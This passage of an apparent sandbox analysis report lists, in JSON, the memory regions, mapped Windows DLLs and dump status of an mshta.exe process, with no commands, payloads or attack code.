"info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1180", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1181", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:07.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1183", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001185-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288490532, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_1186", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1187", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1188", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.147", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001189-addr_0x000007fffffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1189", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:07.147", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001190-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:07.148", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001191-addr_0x0000000000240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1191", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:07.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1192", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:07.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1193", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:07.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1194", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:07.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1195", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:07.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001196-addr_0x0000000000400000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1196", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:07.202", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001197-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_1197", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:07.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1198", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1199", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1200", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1201", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1202", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:07.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1203", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:07.204", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001204-addr_0x00000000006c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x00000000006c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7077888, "timestamp": "00:01:07.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001205-addr_0x0000000000510000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_1205", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:01:07.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": "region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270118592, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_1206", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:07.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1207", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:07.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1208", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:07.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1209", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:07.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1210", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:07.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1211", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:07.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1212", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:07.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1213", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:07.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1214", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791787438080, "timestamp": "00:01:07.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1215", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:07.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1216", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:07.249", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1217", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:07.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1218", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:07.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1219", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": "00:01:07.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630811248, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_1220", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:07.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1221", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:07.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 954367, "entry_point": 790544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1226", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:01:07.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 8749055, "entry_point": 0, "filename": null, "id": "region_1227", "name": "pagefile_0x00000000006d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7143424, "timestamp": "00:01:07.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1229", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:07.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1230", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:07.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 10358783, "entry_point": 0, "filename": null, "id": "region_1231", "name": "pagefile_0x0000000000860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8781824, "timestamp": "00:01:07.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_1232", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:01:07.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1233", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_1234", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_1235", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001236-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1236", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:07.318", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001237-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:07.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1238", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:07.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_1240", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:01:07.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 34013183, "entry_point": 0, "filename": null, "id": "region_1241", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:01:07.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001242-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_1242", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:07.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001243-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], 